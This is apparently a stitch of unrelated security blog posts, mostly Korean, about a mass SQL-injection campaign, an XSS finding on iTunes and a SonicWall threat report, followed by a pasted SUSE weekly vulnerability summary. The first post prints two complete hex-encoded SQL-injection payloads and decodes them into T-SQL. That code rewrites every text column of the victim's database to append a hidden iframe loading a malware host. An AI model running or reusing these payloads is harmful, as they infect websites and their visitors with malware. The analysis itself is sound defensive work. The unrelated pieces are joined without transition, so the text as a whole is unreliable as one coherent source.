TYPO3는 국내에서 그리 많이 알려져 있진 않지만, 계속 소개하는 이유는 바로 오픈소스 계열의 웹 애플리케이션의 취약점에 대해 알리기 위해서 입니다.
실제 외국의 사례를 볼 때, Joomla, WordPress와 같이 널리 사용되는 프로그램에서 취약점이 발생할 경우에는 엄청난 위력을 발휘하기 때문입니다.
하여튼, 지난 번에 TYPO3에 관련된 웹 취약점을 언급한 적이 있습니다. TYPE3에서는 XSS(cross-site scripting) 리디렉션, SQL Injection, 인증 및 세션에 관련된 문제점, 정보 누출, 의도적인 코드 실행 등등, 취약점 종합백화점이라고 말할 수 있었습니다.
최근 전세계적으로 SQL 인젝션 공격이 대규모로 발생하여 약 50여만 개의 웹사이트가 감염되어 충격을 주고 있습니다. 이 중에는 국내 웹사이트도 포함되어 있으며 약 2만 여개로 파악되고 있습니다. 이에 대한 사항을 정리해 봤습니다.
자동화된 SQL 인젝션 공격은 최초에 SANS에서 파악되어 알려졌으며 자세한 사항은 아래와 같습니다.
공격 코드로 추정되는 로그는 다음과 같습니다.
공격 코드 #1. declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
55f435552736f7220%20as%20varchar(4000));exec(@s);--
공격 코드 #2. declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320
566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452
c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420
612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7
220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736
f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27
2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929
2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363
8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232
3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323
6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228
31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054
61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--
이 코드를 해독한 결과 다음과 같은 문자열을 찾아 낼 수 있습니다.
공격 코드 #1.
dEcLArE @T vaRchaR(255),@c
vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM
sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and
(b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN
TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c
whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT
['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E
aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close
tablE_CuRsoR dEALLoCATe TaBLe_CURsor
공격 코드 #2.
declarE @T VarchAr(255),@c
VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM
sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd
(b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN
tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C
WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set
['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E
As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe
TabLE_cURsOR dEAlloCATE TaBlE_CURsoR
주: 차이점은 declare 단어의 대소문자입니다.
두번째 CAST() 에 포함되어 있는 문자열을 해독하면 아래와 같습니다.( 두개가 동일함)
공격 코드 #1 & #2.
<iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
nemohuildiin.ru 도메인은 중국에서 관리한 것으로 알려져 있으며 이미 방탄서버(bulletproof host)로 알려져 있는 AS4134 에 속해 있습니다. 이 네트워크는 Zeus 본넷의 C&C(Command and Control) 서버가 운영 중인 것으로 알려져 있습니다.
구글의 검색 조건을 보다 자세하게 적용한 결과, AS4134가 조종하는 도메인은 약 3,008개에 이르며, 감염된 웹사이트는 약 20,800 개에 이릅니다. 구글 측에 따르면 현재 12,000 여개의 사이트가 현재에도 운영 중에 있다고 합니다.
이렇게 웹 보안에서 가장 문제가 되는 SQL 인젝션 취약점은 최근에는 봇넷을 확장하는데 널리 이용되는 수단이 되고 있으며, 이 이외에도 바이러스 감염, 악성코드 전파 등도 함께 이뤄집니다.
마지막으로, SQL 인젝션 취약점은 WAF(웹 방화벽, Web Application Firewall)로는 막기 어렵다는 것을 다시 한번 상기시켜 줍니다. 즉, 패턴(Pattern 또는 Signature)을 인식하여 차단하는 방식은 글자 한글자만 바꿔도 새로운 패턴으로 인식하는 한계를 지니고 있습니다.
따라서, 이 문제점을 해결하기 위해서는 웹 소스 상에서 모든 매개변수 및 변수에 대해 안전한 값을 주고받는지 확인하는 Santization 과정을 반드시 수행하도록 소스를 개발 및 수정해야 합니다.
A Vietnamese hacker called "Thuat Nguyen" had hacked into iTunes accounts and manipulated the rating and sales for his book apps in July.
Apple does not confirmed an official statement regarding this hacks. But I guess that attack point of this hacks caused by phishing(such as E-mail) or malware such as keylogger.
I assumed that iTunes website may be vulnerable to SQL Injection or XSS attack.
Finally, I've found that iTunes website is vulnerable to XSS attack.
<#1. XSS Attack. iTunes likes google? >
While there are a huge numbers of XSS attack vectors, secure coding (input validation, output escaping) can defend against XSS attack(and SQL Injection).
Please email me(moonslab@gmail.com) if you’re security administrator of Apple or iTunes site.
외국의 유명한 방화벽 업체인 SonicWall에서는 상반기 위협에 대한 보고서를 발표했습니다. 보고서에 따르면, 2010년도 상반기에 주로 발생한 위협 요인은 바로 웹 기반 그리고 클라우드 기반의 공격인 것으로 알려졌습니다. 한편 2009년도에는 웹에 기반한 공격이 미약한 수준이었습니다.
<표 #1. 2009년도 위협 요소>
<표 #2. 2010년도 위협 요소>
특히 웹에 기반한 공격은 2009년도 4%에서 2010년도에는 45%로 매우 높게 증가하였습니다.
한 편, 2009년 상반기에 이 기간에 발생한 악성 코드는 약 60만개였으며, 2010년도 상반기에는 180만개로 3배가량 증가했습니다.
결론적으로, SQL Injeciton 공격과 같은 웹에 기반한 공격은 여전히 증가 추세에 있지만 이에 대한 해결책이 요원합니다. 그리고, 요즘 새롭게 증가하고 있는 클라우드 기반의 Saas 서비스에서도 충분한 보안 대책이 부족한 상태에서 서비스를 진행하는 경우가 많으며, 이에 대한 대비 또한 부족합니다.
To avoid flooding mailing lists with SUSE Security Announcements for minor
issues, SUSE Security releases weekly summary reports for the low profile
vulnerability fixes. The SUSE Security Summary Reports do not list or
download URLs like the SUSE Security Announcements that are released for
more severe vulnerabilities.
Fixed packages for the following incidents are already available on our FTP
server and via the YaST Online Update.
- OpenOffice_org
This update of OpenOffice_org does not allow macros written in Python to
be executed without permission, CVE-2010-0395.
This also provides the maintenance update to OpenOffice.org-3.2.1.
Details about all upstream changes can be found at http://development.openoffice.org/releases/3.2.1.html
Affected Products: SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- apache2-slms
Insufficient quoting of parameters in SLMS could allow for
cross-site-request-forgery (CSRF) attacks (CVE-2010-1325).
Affected Products: SLE11
- aria2
This aria2 update to 1.9.3 fixes a metalink name Directory Traversal
issue (CVE-2010-1512).
Affected Products: openSUSE 11.2
- bogofilter
This update of bogofilter/bogolexer fixes a heap based buffer underflow
vulnerability which could be exploited to cause a denial of service or
potentially execute arbitrary code (CVE-2010-2494).
Affected Products: SLE11, openSUSE 11.0, 11.1, 11.2
- cifs-mount/samba
This update of the Samba server package fixes security issues and bugs.
Following security issues were fixed:
- CVE-2010-2063: A buffer overrun was possible in chain_reply code in
3.3.x and below, which could be used to crash the
samba server or potentially execute code.
- CVE-2010-0787: Take extra care that a mount point of mount.cifs is
not changed during mount.
- CVE-2010-0926: With enabled "wide links" samba follows symbolic links
on the server side, therefore allowing clients to
overwrite arbitrary files. This update changes the
default setting to have "wide links" disabled by default.
The new default only works if "wide links" is not set
explicitly in smb.conf.
- CVE-2010-0547: Due to a race condition in mount.cifs a local attacker
could corrupt /etc/mtab if mount.cifs is installed setuid
root. mount.cifs is not setuid root by default and it is
not recommended to change that.
Affected Products: SLES9, SLE10-SP3, SLE11, openSUSE 11.0, 11.1
- clamav
This update fixes a off-by-one buffer overflow (CVE-2010-1640) and a
crash while parsing PDFs (CVE-2010-1639, CVE-2010-2077) in clamav
that can be used as a remote denial of service attack.
Affected Products: SLES9, SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- exim
Two local vulnerabilities have been fixed in the exim MTA
which allowed attackers to create arbitrary files or
to change ownership of arbitrary files. CVE-2010-2023 and
CVE-2010-2024 have been assigned to these issues.
Affected Products: openSUSE 11.1, 11.2, 11.3
- ghostscript
Specially crafted postscript (.ps) files could cause buffer
overflows in ghostscript that could potentially be exploited to
execute arbitrary code (CVE-2010-1628, CVE-2010-1869, CVE-2009-4270)
Additionally ghostscript, by default, reads some initialization files from
the current working directory. Local attackers could potentially exploit
that to have other users execute arbitrary commands by placing such
files e.g. in /tmp (CVE-2010-2055).
Affected Products: SLE11, openSUSE 11.0, 11.1, 11.2, 11.3
- gnutls
The ASN.1 parser for X.509 certificates used a wrong integer type for
extracting a certficiate's serial number. On 64bit big-endian
architectures this could result in bypassing CRL checks (CVE-2010-0731).
Affected Products: SLES9
- krb5
This update fixes a denial-of-service vulnerability in kadmind. A
remote attack can send a malformed GSS-API token that triggers a
NULL pointer dereference.
(CVE-2010-1321: CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:L/Au:S/C:N/I:N/A:C))
Affected Products: SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- kvirc
This update of KVirc fixes a remotely exploitable format string and
directory traversal vulnerability (CVE-2010-2451, CVE-2010-2452).
Additionally KVirc does not further allow remote client to send
arbitrary CTCP commands. (CVE-2010-2785)
Affected Products: openSUSE 11.1, 11.2, 11.3
- lftp
This update of lftp improves the filename handling of downloaded files
to avoid downloading arbitrary content to unexpected locations (like
.login). (CVE-2010-2251)
Affected Products: openSUSE 11.0, 11.1, 11.2
- libpython2_6-1_0
This update of python has a copy of libxmlrpc that is vulnerable to
denial of service bugs that can occur while processing malformed XML
input.
- CVE-2009-2625: CVSS v2 Base Score: 5.0: Permissions, Privileges,
and Access Control (CWE-264)
- CVE-2009-3720: CVSS v2 Base Score: 5.0: Insufficient Information
- CVE-2009-3560: CVSS v2 Base Score: 5.0: Buffer Errors (CWE-119)
Affected Products: SLES9, SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- libtiff
This update of libtiff fixes several integer overflows that could lead
to a corrupted heap memory. This bug can be exploited remotely with a
crafted TIFF file to cause an application crash or probably to execute
arbitrary code. (CVE-2010-1411)
Affected Products: SLES9, SLE10-SP3, openSUSE 11.0, 11.1, 11.2
- libvorbis
This update of libvorbis fixes a memory corruption while parsing OGG
files. This bug was exploitable by remote attackers to cause an
application crash and could probably be exploited to execute arbitrary
code.
CVE-2009-2663: CVSS v2 Base Score: 6.8: Resource Management Errors (CWE-399)
Affected Products: SLES9, SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- lxsession
lxsession-logout did not properly lock the screen before suspending,
hibernating and switching between users which could allow attackers with
physical access to take control of the system to obtain sensitive infor-
mation and / or execute arbitrary code in the context of the user who is
currently logged in (CVE-2010-2532).
Affected Products: openSUSE 11.3
- mono-addon-bytefx-data-mysql/bytefx-data-mysql
Mono's ASP.NET implementation did not set the 'EnableViewStateMac'
property by default. Attackers could exploit that to conduct cross-
site-scripting (XSS) attacks. (CVE-2010-1459)
Affected Products: SLE10-SP2, SLE11, openSUSE 11.0, 11.1, 11.2
- moodle
Moodle was prone to several Cross-Site Scripting (XSS) vulnerabilities
(CVE-2010-2228, CVE-2010-2229, CVE-2010-2230, CVE-2010-2231).
Affected Products: openSUSE 11.0, 11.1
- openldap2
Specially crafted MODRDN operations can crash the OpenLDAP server.
(CVE-2010-0211 and CVE-2010-0212)
Affected Products: openSUSE 11.0
- opera
Opera was upgraded to the 10.60 release.
- CVE-2010-0653: Opera permits cross-origin loading of CSS style sheets
even when the style sheet download has an incorrect
MIME type and the style sheet document is malformed,
which allows remote HTTP servers to obtain sensitive
information via a crafted document.
- CVE-2010-1993: Opera 9.52 does not properly handle an IFRAME element
with a mailto: URL in its SRC attribute, which allows
remote attackers to cause a denial of service (resource
consumption) via an HTML document with many IFRAME
elements.
Affected Products: openSUSE 11.0, 11.1, 11.2, 11.3
- otrs
OTRS was prone to multiple SQL-injection vulnerabilities which could
allow remote authenticated attackers to execute arbitrary SQL code via
unspecified vectors. (CVE-2010-0438)
Affected Products: openSUSE 11.0, 11.1, 11.2
- popt
This update fixes the problem where RPM misses to clear the SUID/SGID
bit of old files during package updates. (CVE-2010-2059)
Affected Products: openSUSE 11.0
- postgresql
This update of postgresql was pblished to fix several minor security
vulnerabilities:
- CVE-2010-1975: postgresql does not properly check privileges during
certain RESET ALL operations, which allows remote
authenticated users to remove arbitrary parameter
settings.
- CVE-2010-1170: The PL/Tcl implementation in postgresql loads Tcl
code from the pltcl_modules table regardless of the
table's ownership and permissions, which allows remote
authenticated users, with database-creation privileges,
to execute arbitrary Tcl code.
- CVE-2010-1169: Postgresql does not properly restrict PL/perl procedures,
which allows remote authenticated users, with database-
creation privileges, to execute arbitrary Perl code via
a crafted script.
- CVE-2010-0733: An integer overflow in postgresql allows remote authen-
ticated users to crash the daemon via a SELECT statement.
Affected Products: SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- python-mako
Python-mako was prone to a Cross-Site Scripting flaw due to improperly
escaped single quotes (CVE-2010-2480).
Affected Products: openSUSE 11.2, 11.3
- squidGuard
Two buffer overflows in squidGard were fixed:
- CVE-2009-3700: Buffer overflow in sgLog.c in squidGuard 1.3 and 1.4
allows remote attackers to cause a denial of service
(application hang or loss of blocking functionality)
via a long URL with many / (slash) characters, related
to "emergency mode."
- CVE-2009-3826: Multiple buffer overflows in squidGuard 1.4 allow remote
attackers to bypass intended URL blocking via a long URL,
related to (1) the relationship between a certain buffer
size in squidGuard and a certain buffer size in Squid and
(2) a redirect URL that contains information about the
originally requested URL.
Affected Products: openSUSE 11.1, 11.2, 11.3
- vte
VTE was vulnerable to an old title set+query attack which could be used
by remote attackers to execute arbitrary code (CVE-2010-2713).
Affected Products: openSUSE 11.2, 11.3
- w3m
w3m did not handle embedded nul characters in the common name and in
subject alternative names of x509 certificates.
CVE-2010-2074 has been assigned to this issue.
This update also turns on verification of x509 certificates by default
which was not the case before.
Affected Products: SLE10-SP3, SLE11, openSUSE 11.0, 11.1, 11.2
- xmlrpc-c
This update of libxmlrpc is not vulnerable to denial of service bugs
that can occur while processing malformed XML input.
- CVE-2009-2625: CVSS v2 Base Score: 5.0: Permissions, Privileges,
and Access Control (CWE-264)
- CVE-2009-3720: CVSS v2 Base Score: 5.0: Insufficient Information
- CVE-2009-3560: CVSS v2 Base Score: 5.0: Buffer Errors (CWE-119)
Affected Products: SLES9, SLE11
- XFree86/xorg-x11
X clients could cause a memory corruption in the X Render extension
which crashes the X server (CVE-2010-1166).
Affected Products: SLES9, SLE10-SP3
- yast2-webclient
WebYaST generates the secret key used to create session cookies
after package installation. Since WebYaST appliances use
pre-installed images all such instances end up using the same secret
key (CVE-2010-1507).